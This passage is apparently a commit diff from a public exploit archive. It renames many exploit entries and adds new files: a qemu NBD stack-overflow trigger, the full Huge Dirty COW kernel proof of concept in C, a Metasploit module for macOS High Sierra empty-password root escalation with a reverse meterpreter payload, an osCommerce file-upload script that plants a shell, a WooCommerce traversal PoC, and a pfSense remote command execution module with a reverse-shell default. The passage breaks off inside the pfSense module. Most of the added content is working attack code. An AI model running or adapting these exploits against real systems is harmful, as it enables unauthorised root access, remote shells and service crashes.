UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape UCOPIA Wireless Appliance < 5.1.8 - Local Privilege Escalation UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation macOS High Sierra - Root Privilege Escalation (Metasploit) lftp 2.6.9 - Remote Stack based Overflow lftp 2.6.9 - Remote Stack Overflow BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack/SEH Overflow BlueCoat WinProxy 6.0 R1c - 'Host' Remote Stack Overflow (SEH) KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Based Buffer Overflow (PoC) KarjaSoft Sami FTP Server 2.0.1 - Remote Stack Buffer Overflow (PoC) HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Buffer Overflow Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit) Microsoft MPEG Layer-3 Audio - Stack Overflow (MS10-026) (Metasploit) Citrix Gateway - ActiveX Control Stack Based Buffer Overflow (Metasploit) Citrix Gateway - ActiveX Control Stack Buffer Overflow (Metasploit) Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack-Based Buffer Overflow (Metasploit) Viscom Software Movie Player Pro SDK ActiveX 6.8 - Stack Buffer Overflow (Metasploit) Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (1) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (2) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Based Buffer Overrun (3) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (1) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (2) Jordan Windows Telnet Server 1.0/1.2 - 'Username' Stack Buffer Overrun (3) GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2) GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (2) Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities RealNetworks RealOne Player/RealPlayer - '.RM' File Remote Stack Based Buffer Overflow Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Based Buffer Overflow Trend Micro ServerProtect 5.58 - 'SpntSvc.exe' Remote Stack Buffer Overflow Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Based Buffer Overflow Skulltag Huffman 0.97d-beta4.1 - Packet Decompression Remote Heap Buffer Overflow AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Based Buffer Overflow AkkyWareHOUSE '7-zip32.dll' 4.42 - Heap Buffer Overflow Xine-Lib 1.1.11 - Multiple Heap Based Remote Buffer Overflow Vulnerabilities Xine-Lib 1.1.11 - Multiple Heap Remote Buffer Overflow Vulnerabilities Vim - 'mch_expand_wildcards()' Heap Based Buffer Overflow Vim - 'mch_expand_wildcards()' Heap Buffer Overflow Acunetix 8 build 20120704 - Remote Stack Based Overflow Acunetix 8 build 20120704 - Remote Stack Overflow Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Based Buffer Overflow Mozilla Firefox 3.5.3 / SeaMonkey 1.1.17 - 'libpr0n' .GIF Parser Heap Buffer Overflow TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Based Buffer Overflow Stub TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub glibc - 'getaddrinfo' Stack Based Buffer Overflow glibc - 'getaddrinfo' Remote Stack Buffer Overflow BlueVoda Website Builder 11 - '.bvp' File Stack Based Buffer Overflow Sunway ForceControl 6.1 - Multiple Heap Based Buffer Overflow Vulnerabilities Sunway ForceControl 6.1 - Multiple Heap Buffer Overflow Vulnerabilities R2/Extreme 1.65 - Stack Based Buffer Overflow / Directory Traversal R2/Extreme 1.65 - Stack Buffer Overflow / Directory Traversal Alligra Calligra - Heap Based Buffer Overflow Alligra Calligra - Heap Buffer Overflow Aloaha PDF Suite - Stack Based Buffer Overflow Aloaha PDF Suite - Remote Stack Buffer Overflow EasyCafe Server 2.2.14 - Remote File Read Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit) ZScada Modbus Buffer 2.0 - Stack Buffer Overflow (Metasploit) Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit) Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack Buffer Overflow (Metasploit) pfSense - Authenticated Group Member Remote Command Execution (Metasploit) Almnzm - 'COOKIE: customer' SQL Injection Tutorialms 1.4 (show) - SQL Injection Tutorialms 1.4 - 'show' SQL Injection osCommerce 2.3.4.1 - Arbitrary File Upload Knowledge Base Enterprise Edition 4.62.00 - SQL Injection Knowledge Base Enterprise Edition 4.62.0 - SQL Injection WordPress Plugin Users Ultra 1.5.50 - Unrestricted Arbitrary File Upload phpDolphin 2.0.5 - Multiple Vulnerabilities OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities AbanteCart 1.2.7 - Cross-Site Scripting MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection ViMbAdmin 3.0.15 - Multiple Cross-Site Request Forgery Vulnerabilities Symantec Messaging Gateway 10.6.3-2 - Unauthenticated root Remote Command Execution Symantec Messaging Gateway 10.6.3-2 - Unauthenticated Root Remote Command Execution phpCollab 2.5.1 - Arbitrary File Upload phpCollab 2.5.1 - SQL Injection phpCollab 2.5.1 - Arbitrary File Upload phpCollab 2.5.1 - SQL Injection Synology StorageManager 5.2 - Remote Root Command Execution Synology StorageManager 5.2 - Root Remote Command Execution WordPress Plugin WooCommerce 2.0/3.0 - Directory Traversal --- exploits/jsp/webapps/{40065.txt => 40065.md} | 0 exploits/linux/dos/{38857.txt => 38857.md} | 0 exploits/linux/dos/43194.txt | 20 + exploits/linux/dos/43199.c | 181 +++++++ exploits/linux/local/{39992.txt => 39992.md} | 0 exploits/linux/local/{41158.txt => 41158.md} | 0 exploits/linux/local/{42936.txt => 42936.md} | 0 exploits/linux/local/{42937.txt => 42937.md} | 0 exploits/linux/{local => remote}/23154.c | 0 exploits/linux/{local => remote}/25080.txt | 0 exploits/macos/local/43201.rb | 55 ++ .../multiple/local/{41021.txt => 41021.md} | 0 exploits/netware/{local => remote}/19364.txt | 0 exploits/osx/local/{41149.txt => 41149.md} | 0 exploits/php/webapps/{38750.txt => 38750.md} | 0 exploits/php/webapps/{39243.txt => 39243.md} | 0 exploits/php/webapps/{40877.txt => 40877.md} | 0 exploits/php/webapps/{41150.txt => 41150.md} | 0 exploits/php/webapps/{41746.txt => 41746.md} | 0 exploits/php/webapps/{41747.txt => 41747.md} | 0 exploits/php/webapps/{41967.txt => 41967.md} | 0 exploits/php/webapps/{42934.txt => 42934.md} | 0 exploits/php/webapps/{42935.txt => 42935.md} | 0 exploits/php/webapps/43191.py | 119 +++++ exploits/php/webapps/43196.txt | 43 ++ exploits/php/webapps/{9035.txt => 9035.php} | 0 exploits/unix/remote/43193.rb | 189 +++++++ exploits/win_x86/local/43192.c | 68 +++ exploits/windows/{remote => local}/26497.c | 2 + exploits/windows/{remote => local}/35714.pl | 0 exploits/windows/{local => remote}/39102.py | 0 exploits/windows/{local => remote}/40043.py | 0 files_exploits.csv | 475 +++++++++--------- 33 files changed, 918 insertions(+), 234 deletions(-) rename exploits/jsp/webapps/{40065.txt => 40065.md} (100%) rename exploits/linux/dos/{38857.txt => 38857.md} (100%) create mode 100644 exploits/linux/dos/43194.txt create mode 100644 exploits/linux/dos/43199.c rename exploits/linux/local/{39992.txt => 39992.md} (100%) rename exploits/linux/local/{41158.txt => 41158.md} (100%) rename exploits/linux/local/{42936.txt => 42936.md} (100%) rename exploits/linux/local/{42937.txt => 42937.md} (100%) rename exploits/linux/{local => remote}/23154.c (100%) rename exploits/linux/{local => remote}/25080.txt (100%) create mode 100755 exploits/macos/local/43201.rb rename exploits/multiple/local/{41021.txt => 41021.md} (100%) rename exploits/netware/{local => remote}/19364.txt (100%) rename exploits/osx/local/{41149.txt => 41149.md} (100%) rename exploits/php/webapps/{38750.txt => 38750.md} (100%) rename exploits/php/webapps/{39243.txt => 39243.md} (100%) rename exploits/php/webapps/{40877.txt => 40877.md} (100%) rename exploits/php/webapps/{41150.txt => 41150.md} (100%) rename exploits/php/webapps/{41746.txt => 41746.md} (100%) rename exploits/php/webapps/{41747.txt => 41747.md} (100%) rename exploits/php/webapps/{41967.txt => 41967.md} (100%) rename exploits/php/webapps/{42934.txt => 42934.md} (100%) rename exploits/php/webapps/{42935.txt => 42935.md} (100%) create mode 100755 exploits/php/webapps/43191.py create mode 100644 exploits/php/webapps/43196.txt rename exploits/php/webapps/{9035.txt => 9035.php} (100%) create mode 100755 exploits/unix/remote/43193.rb create mode 100644 exploits/win_x86/local/43192.c rename exploits/windows/{remote => local}/26497.c (97%) rename exploits/windows/{remote => local}/35714.pl (100%) rename exploits/windows/{local => remote}/39102.py (100%) rename exploits/windows/{local => remote}/40043.py (100%) diff --git a/exploits/jsp/webapps/40065.txt b/exploits/jsp/webapps/40065.md similarity index 100% rename from exploits/jsp/webapps/40065.txt rename to exploits/jsp/webapps/40065.md diff --git a/exploits/linux/dos/38857.txt b/exploits/linux/dos/38857.md similarity index 100% rename from exploits/linux/dos/38857.txt rename to exploits/linux/dos/38857.md diff --git a/exploits/linux/dos/43194.txt b/exploits/linux/dos/43194.txt new file mode 100644 index 000000000..4185b0553 --- /dev/null +++ b/exploits/linux/dos/43194.txt @@ -0,0 +1,20 @@ +Introduced in commit f37708f6b8 (2.10). The NBD spec says a client +can request export names up to 4096 bytes in length, even though +they should not expect success on names longer than 256. However, +qemu hard-codes the limit of 256, and fails to filter out a client +that probes for a longer name; the result is a stack smash that can +potentially give an attacker arbitrary control over the qemu +process. + +The smash can be easily demonstrated with this client: + +$ qemu-io f raw nbd://localhost:10809/$(printf %3000d 1 | tr ' ' a) + +If the qemu NBD server binary (whether the standalone qemu-nbd, or +the builtin server of QMP nbd-server-start) was compiled with +-fstack-protector-strong, the ability to exploit the stack smash +into arbitrary execution is a lot more difficult (but still +theoretically possible to a determined attacker, perhaps in +combination with other CVEs). Still, crashing a running qemu (and +losing the VM) is bad enough, even if the attacker did not obtain +full execution control. \ No newline at end of file diff --git a/exploits/linux/dos/43199.c b/exploits/linux/dos/43199.c new file mode 100644 index 000000000..7c241bb54 --- /dev/null +++ b/exploits/linux/dos/43199.c @@ -0,0 +1,181 @@ +// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0 +// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC +// Author Note: Before running, make sure to set transparent huge pages to "always": `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled` +// + +// +// The Huge Dirty Cow POC. This program overwrites the system's huge zero page. +// Compile with "gcc -pthread main.c" +// +// November 2017 +// Bindecy +// + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define MAP_BASE ((void *)0x4000000) +#define MAP_SIZE (0x200000) +#define MEMESET_VAL (0x41) +#define PAGE_SIZE (0x1000) +#define TRIES_PER_PAGE (20000000) + +struct thread_args { + char *thp_map; + char *thp_chk_map; + off_t off; + char *buf_to_write; + int stop; + int mem_fd1; + int mem_fd2; +}; + +typedef void * (*pthread_proc)(void *); + +void *unmap_and_read_thread(struct thread_args *args) { + char c; + int i; + for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { + madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page. + + memcpy(&c, args->thp_map + args->off, sizeof(c)); + read(args->mem_fd2, &c, sizeof(c)); + + lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET); + usleep(10); // We placed the zero page and marked its PMD as dirty. + // Give get_user_pages() another chance before madvise()-ing again. + } + + return NULL; +} + +void *write_thread(struct thread_args *args) { + int i; + for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { + lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET); + madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail. + write(args->mem_fd1, args->buf_to_write, PAGE_SIZE); + } + + return NULL; +} + +void *wait_for_success(struct thread_args *args) { + while (args->thp_chk_map[args->off] != MEMESET_VAL) { + madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED); + sched_yield(); + } + + args->stop = 1; + return NULL; +} + +int main() { + struct thread_args args; + void *thp_chk_map_addr; + int ret; + + // Mapping base should be a multiple of the THP size, so we can work with the whole huge page. + args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (args.thp_map == MAP_FAILED) { + perror("[!] mmap()"); + return -1; + } + if (args.thp_map != MAP_BASE) { + fprintf(stderr, "[!] Didn't get desired base address for the vulnerable mapping.\n"); + goto err_unmap1; + } + + printf("[*] The beginning of the zero huge page: %lx\n", *(unsigned long *)args.thp_map); + + thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge + args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + if (args.thp_chk_map == MAP_FAILED) { + perror("[!] mmap()"); + goto err_unmap1; + } + if (args.thp_chk_map != thp_chk_map_addr) { + fprintf(stderr, "[!] Didn't get desired base address for the check mapping.\n"); + goto err_unmap2; + } + + ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); + ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE); + if (ret) { + perror("[!] madvise()"); + goto err_unmap2; + } + + args.buf_to_write = malloc(PAGE_SIZE); + if (!args.buf_to_write) { + perror("[!] malloc()"); + goto err_unmap2; + } + memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE); + + args.mem_fd1 = open("/proc/self/mem", O_RDWR); + if (args.mem_fd1 < 0) { + perror("[!] open()"); + goto err_free; + } + + args.mem_fd2 = open("/proc/self/mem", O_RDWR); + if (args.mem_fd2 < 0) { + perror("[!] open()"); + goto err_close1; + } + + printf("[*] Racing. Gonna take a while...\n"); + args.off = 0; + + // Overwrite every single page + while (args.off < MAP_SIZE) { + pthread_t threads[3]; + args.stop = 0; + + ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args); + ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args); + ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args); + + if (ret) { + perror("[!] pthread_create()"); + goto err_close2; + } + + pthread_join(threads[0], NULL); // This call will return only after the overwriting is done + pthread_join(threads[1], NULL); + pthread_join(threads[2], NULL); + + args.off += PAGE_SIZE; + printf("[*] Done 0x%lx bytes\n", args.off); + } + + printf("[*] Success!\n"); + +err_close2: + close(args.mem_fd2); +err_close1: + close(args.mem_fd1); +err_free: + free(args.buf_to_write); +err_unmap2: + munmap(args.thp_chk_map, MAP_SIZE); +err_unmap1: + munmap(args.thp_map, MAP_SIZE); + + if (ret) { + fprintf(stderr, "[!] Exploit failed.\n"); + } + + return ret; +} \ No newline at end of file diff --git a/exploits/linux/local/39992.txt b/exploits/linux/local/39992.md similarity index 100% rename from exploits/linux/local/39992.txt rename to exploits/linux/local/39992.md diff --git a/exploits/linux/local/41158.txt b/exploits/linux/local/41158.md similarity index 100% rename from exploits/linux/local/41158.txt rename to exploits/linux/local/41158.md diff --git a/exploits/linux/local/42936.txt b/exploits/linux/local/42936.md similarity index 100% rename from exploits/linux/local/42936.txt rename to exploits/linux/local/42936.md diff --git a/exploits/linux/local/42937.txt b/exploits/linux/local/42937.md similarity index 100% rename from exploits/linux/local/42937.txt rename to exploits/linux/local/42937.md diff --git a/exploits/linux/local/23154.c b/exploits/linux/remote/23154.c similarity index 100% rename from exploits/linux/local/23154.c rename to exploits/linux/remote/23154.c diff --git a/exploits/linux/local/25080.txt b/exploits/linux/remote/25080.txt similarity index 100% rename from exploits/linux/local/25080.txt rename to exploits/linux/remote/25080.txt diff --git a/exploits/macos/local/43201.rb b/exploits/macos/local/43201.rb new file mode 100755 index 000000000..59346702e --- /dev/null +++ b/exploits/macos/local/43201.rb @@ -0,0 +1,55 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Mac OS X Root Privilege Escalation', + 'Description' => %q{ + This module exploits a serious flaw in MacOSX High Sierra. + Any user can login with user "root", leaving an empty password. + }, + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ], + [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ], + [ 'URL', 'https://forums.developer.apple.com/thread/79235' ], + ], + 'Platform' => 'osx', + 'Arch' => ARCH_X64, + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + }, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 29 2017' + )) + end + + def exploit_cmd(root_payload) + "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'" + end + + def exploit + payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}" + print_status("Writing payload file as '#{payload_file}'") + write_file(payload_file, payload.raw) + register_file_for_cleanup(payload_file) + output = cmd_exec("chmod +x #{payload_file}") + print_status("Executing payload file as '#{payload_file}'") + cmd_exec(exploit_cmd(payload_file)) + end +end \ No newline at end of file diff --git a/exploits/multiple/local/41021.txt b/exploits/multiple/local/41021.md similarity index 100% rename from exploits/multiple/local/41021.txt rename to exploits/multiple/local/41021.md diff --git a/exploits/netware/local/19364.txt b/exploits/netware/remote/19364.txt similarity index 100% rename from exploits/netware/local/19364.txt rename to exploits/netware/remote/19364.txt diff --git a/exploits/osx/local/41149.txt b/exploits/osx/local/41149.md similarity index 100% rename from exploits/osx/local/41149.txt rename to exploits/osx/local/41149.md diff --git a/exploits/php/webapps/38750.txt b/exploits/php/webapps/38750.md similarity index 100% rename from exploits/php/webapps/38750.txt rename to exploits/php/webapps/38750.md diff --git a/exploits/php/webapps/39243.txt b/exploits/php/webapps/39243.md similarity index 100% rename from exploits/php/webapps/39243.txt rename to exploits/php/webapps/39243.md diff --git a/exploits/php/webapps/40877.txt b/exploits/php/webapps/40877.md similarity index 100% rename from exploits/php/webapps/40877.txt rename to exploits/php/webapps/40877.md diff --git a/exploits/php/webapps/41150.txt b/exploits/php/webapps/41150.md similarity index 100% rename from exploits/php/webapps/41150.txt rename to exploits/php/webapps/41150.md diff --git a/exploits/php/webapps/41746.txt b/exploits/php/webapps/41746.md similarity index 100% rename from exploits/php/webapps/41746.txt rename to exploits/php/webapps/41746.md diff --git a/exploits/php/webapps/41747.txt b/exploits/php/webapps/41747.md similarity index 100% rename from exploits/php/webapps/41747.txt rename to exploits/php/webapps/41747.md diff --git a/exploits/php/webapps/41967.txt b/exploits/php/webapps/41967.md similarity index 100% rename from exploits/php/webapps/41967.txt rename to exploits/php/webapps/41967.md diff --git a/exploits/php/webapps/42934.txt b/exploits/php/webapps/42934.md similarity index 100% rename from exploits/php/webapps/42934.txt rename to exploits/php/webapps/42934.md diff --git a/exploits/php/webapps/42935.txt b/exploits/php/webapps/42935.md similarity index 100% rename from exploits/php/webapps/42935.txt rename to exploits/php/webapps/42935.md diff --git a/exploits/php/webapps/43191.py b/exploits/php/webapps/43191.py new file mode 100755 index 000000000..985a6d1d2 --- /dev/null +++ b/exploits/php/webapps/43191.py @@ -0,0 +1,119 @@ +# Exploit Title: osCommerce 2.3.4.1 Authenticated Arbitrary File Upload +# Date: 11.11.2017 +# Exploit Author: Simon Scannell - https://scannell-infosec.net +# Vendor Homepage: https://www.oscommerce.com/ +# Software Link: https://www.oscommerce.com/Products&Download=oscom234 +# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable +# Tested on: Linux, Windows + +""" +osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user +being privileged enough to send newsletters can exploit an objection injection in the osCommerce core to +upload any file, allowing the user to gain shell access. The user does not need to be an administrator, +any account with access to the newsletters will do. +More details can be found here: + https://scannell-infosec.net/uploading-a-shell-from-within-the-oscommerce-admin-panel-via-object-injection/ +""" + +import urlparse +import argparse +import sys +import requests + + +DEFAULT_ADMIN_URL = "/catalog/admin/" +DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php" + + +# Builds an authenticated session and returns it if it was successful +def authenticate(username, password, url): + # Build the Session and grab the inital cookie + session = requests.Session() + session.get(url + "login.php", allow_redirects=False) + + get_params = {'action': "process"} + data = {"username": username, "password": password} + + # Attempt the authentication + r = session.post(url + "login.php", data=data, params=get_params, allow_redirects=False) + + if r.status_code == 302: + return session + else: + return False + + +def upload_file(local_filename, session, url): + newsletter_script = url + "newsletters.php" + r = session.get(newsletter_script, params={"action": "new"}) + + payload = { + 'module': 'upload', + 'title': 'uploaded_fname', + 'content': './' + } + + # Create the vulnerable newsletter and grab its ID + r = session.post(newsletter_script, params={"action": "insert"}, data=payload, allow_redirects=False) + try: + newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:] + print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id) + except: + print "[-] The script wasn't able to create a new newsletter" + exit(1) + + # Now lock the newsletter + r = session.post(newsletter_script, params={"action": "lock", "nID": newsletter_id}) + print "[+] Successfully locked the newsletter. Now attempting to upload.." + + # Send the final request, containing the file! + files = { + 'uploaded_fname': open(local_filename) + } + r = session.post(newsletter_script, params={"action": "send", "nID": newsletter_id}, files=files) + + print "[*] Now trying to verify that the file %s uploaded.." % (local_filename) + + shell_url = url + local_filename + r = requests.get(shell_url) + print "[+] Got a HTTP 200 Reply for the uploaded file!" + print "[+] The uploaded file should now be available at %s" % (shell_url) + + + +# Main Routine starts here + +usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \ + "Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \ + "NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0]) + + +parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage) +parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True) +parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True) +parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True) +parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False) +args = parser.parse_args() + +# Parse username and password +username = args.auth.split(":")[0] +password = args.auth.split(":")[1] + + +url = args.target_url +# If the user hasn't passed a path to the osCommerce Admin Panel, use the default +if not args.admin_path: + url += DEFAULT_ADMIN_URL +else: + url += args.admin_path + +# Authenticate the user and establish the connection +session = authenticate(username, password, url) + +if not session: + print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php") + exit(1) +else: + print "[+] Authentication successful" + +upload_file(args.file, session, url) \ No newline at end of file diff --git a/exploits/php/webapps/43196.txt b/exploits/php/webapps/43196.txt new file mode 100644 index 000000000..3e9bc51ec --- /dev/null +++ b/exploits/php/webapps/43196.txt @@ -0,0 +1,43 @@ +# Exploit Title: WordPress woocommerce directory traversal +# Date: 28-11-2017 +# Software Link: https://wordpress.org/plugins/woocommerce/ +# Exploit Author:fu2x2000 +# Contact: fu2x2000@gmail.com +# Website: +# CVE:2017-17058 +#Version:Tested on WordPress 4.8.3 woocommerce 2.0/3.0 +# Category: webapps + + +1. Description + +Identifying woo commerce theme pluging properly sanitized against Directory +Traversal,even the latest version of WordPress with woocommerce can be +vulnerable. + +2. Proof of Concept + +$woo = "www/wp-content/plugins/woocommerce/templates/emails/plain/"; ` +function file_get_contents_utf8($fn) { + $opts = array( + 'http' => array( + 'method'=>"GET", + 'header'=>"Content-Type: text/html; charset=utf-8" + ) + ); + + $wp = stream_context_create($opts); + $result = @file_get_contents($fn,false,$wp); + return $result; +} +/* $head= header("Content-Type: text/html; charset=utf-8"); ; */ +header("Content-Type: text/html; charset=utf-8"); + +$result = file_get_contents_utf8("http://".$woo); + +echo $result; + + +Regards + +Fu2x200 \ No newline at end of file diff --git a/exploits/php/webapps/9035.txt b/exploits/php/webapps/9035.php similarity index 100% rename from exploits/php/webapps/9035.txt rename to exploits/php/webapps/9035.php diff --git a/exploits/unix/remote/43193.rb b/exploits/unix/remote/43193.rb new file mode 100755 index 000000000..42d5c3259 --- /dev/null +++ b/exploits/unix/remote/43193.rb @@ -0,0 +1,189 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'pfSense authenticated group member RCE', + 'Description' => %q( + pfSense, a free BSD based open source firewall distribution, + version <= 2.3.1_1 contains a remote command execution + vulnerability post authentication in the system_groupmanager.php page. + Verified against 2.2.6 and 2.3. + ), + 'Author' => + [ + 's4squatch', # discovery + 'h00die' # module + ], + 'References' => + [ + [ 'EDB', '43128' ], + [ 'URL', 'https://www.pfsense.org/security/advisories/pfSense-SA-16_08.webgui.asc'] + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Privileged' => false, + 'DefaultOptions' => + { + 'SSL' => true, + 'PAYLOAD' => 'cmd/unix/reverse_openssl' + }, + 'Arch' => [ ARCH_CMD ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl openssl' + } + }, + 'Targets' => + [ + [ 'Automatic Target', {}] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Nov 06 2017' + ) + ) + + register_options( + [ + OptString.new('USERNAME', [ true, 'User to login with', 'admin']), + OptString.new('PASSWORD', [ false, 'Password to login with', 'pfsense']), + Opt::RPORT(443) + ], self.class + ) + end + + def login + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_status("CSRF Token for login: #{csrf}") + + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'POST', + 'vars_post' => { + '__csrf_magic' => csrf, + 'usernamefld' => datastore['USERNAME'], + 'passwordfld' => datastore['PASSWORD'], + 'login' => '' + } + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + if res.code == 302 + vprint_status('Successful Authentication') + return res.get_cookies + else + fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed: #{datastore['USERNAME']}:#{datastore['PASSWORD']}") + return nil + end + end + + def detect_version(cookie) + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET', + 'cookie' => cookie + ) + unless res + fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to authentication request") + end + /Version.+(?[0-9\.\-RELEASE]+)[\n]?<\/strong>/m =~ res.body + if version + print_status("pfSense Version Detected: #{version}") + return Gem::Version.new(version) + end + # If the device isn't fully setup, you get stuck at redirects to wizard.php + # however, this does NOT stop exploitation strangely + print_error("pfSens Version Not Detected or wizard still enabled.") + Gem::Version.new('0.0') + end + + def check + begin + res = send_request_cgi( + 'uri' => '/index.php', + 'method' => 'GET' + ) + fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil? + fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200 + if /Login to pfSense/ =~ res.body + Exploit::CheckCode::Detected + else + Exploit::CheckCode::Safe + end + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") + end + end + + def exploit + begin + cookie = login + version = detect_version(cookie) + vprint_good('Login Successful') + res = send_request_cgi( + 'uri' => '/system_groupmanager.php', + 'method' => 'GET', + 'cookie' => cookie, + 'vars_get' => { + 'act' => 'new' + } + ) + + /var csrfMagicToken = "(?sid:[a-z0-9,;:]+)";/ =~ res.body + fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil? + vprint_status("CSRF Token for group creation: #{csrf}") + + group_name = rand_text_alpha(10) + post_vars = { + '__csrf_magic' => csrf, + 